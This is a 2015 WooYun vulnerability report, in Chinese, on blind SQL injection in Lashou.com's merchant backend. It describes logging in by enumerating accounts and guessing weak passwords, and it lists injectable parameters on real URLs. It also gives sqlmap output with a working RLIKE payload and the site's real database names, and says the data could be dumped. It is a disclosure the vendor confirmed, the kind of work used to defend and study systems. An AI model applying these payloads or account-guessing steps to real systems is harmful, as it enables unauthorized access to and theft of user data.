当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0103461

漏洞标题:拉手网某网站SQL注入数枚

相关厂商:拉手网

漏洞作者: 403

提交时间:2015-03-24 16:25

修复时间:2015-05-08 17:46

公开时间:2015-05-08 17:46

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-24: 细节已通知厂商并且等待厂商处理中
2015-03-24: 厂商已经确认,细节仅向厂商公开
2015-04-03: 细节向核心白帽子及相关领域专家公开
2015-04-13: 细节向普通白帽子公开
2015-04-23: 细节向实习白帽子公开
2015-05-08: 细节向公众公开

简要描述:

存在多处盲注。

详细说明:

通过拉手网商家后台找回密码页面模糊测试获取账号,再通过账号弱口令测试得到账号密码5/5
http://cg.lashou.com/new_index.php?class=FindPasswd&old=0
然后登录检测获取盲注点数枚:
http://nsp.lashou.com/Home/Comment/index?end_time=2015-03-23&fd_id=&goods_id=1&is_reply=0&score=0&start_time=2015-03-23 (分店fd_id存在延时盲注)
http://nsp.lashou.com/Home/Commfeedback/submitfeedback?feedback=&mer_ask=1&telephone= (三个参数均存在布尔型盲注)
小试了下可脱裤。

漏洞证明:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: telephone
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: feedback=&mer_ask=1&telephone=555-666-0606" RLIKE (SELECT (CASE WHEN (7628=7628) THEN 0x3535352d3636362d30363036 ELSE 0x28 END)) AND "YdfZ"="YdfZ
---
back-end DBMS: MySQL >= 5.0.0
current user: 'StarCraft@10.168.%.%'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: telephone
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: feedback=&mer_ask=1&telephone=555-666-0606" RLIKE (SELECT (CASE WHEN (7628=7628) THEN 0x3535352d3636362d30363036 ELSE 0x28 END)) AND "YdfZ"="YdfZ
---
back-end DBMS: MySQL >= 5.0.0
current user is DBA: False
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: telephone
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: feedback=&mer_ask=1&telephone=555-666-0606" RLIKE (SELECT (CASE WHEN (7628=7628) THEN 0x3535352d3636362d30363036 ELSE 0x28 END)) AND "YdfZ"="YdfZ
---
back-end DBMS: MySQL >= 5.0.0
current database: 'nsp'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: telephone
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: feedback=&mer_ask=1&telephone=555-666-0606" RLIKE (SELECT (CASE WHEN (7628=7628) THEN 0x3535352d3636362d30363036 ELSE 0x28 END)) AND "YdfZ"="YdfZ
---
back-end DBMS: MySQL >= 5.0.0
available databases [9]:
[*] `session`
[*] community
[*] information_schema
[*] lashou_activity
[*] lashou_ht
[*] lashou_info
[*] mysql
[*] nsp
[*] test

修复方案:

过滤,另外商户后台禁止弱口令。

版权声明:转载请注明来源 403@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2015-03-24 17:45

厂商回复:

谢谢您的关注.漏洞已经告知研发.研发正在着手改正.万谢.

最新状态:

暂无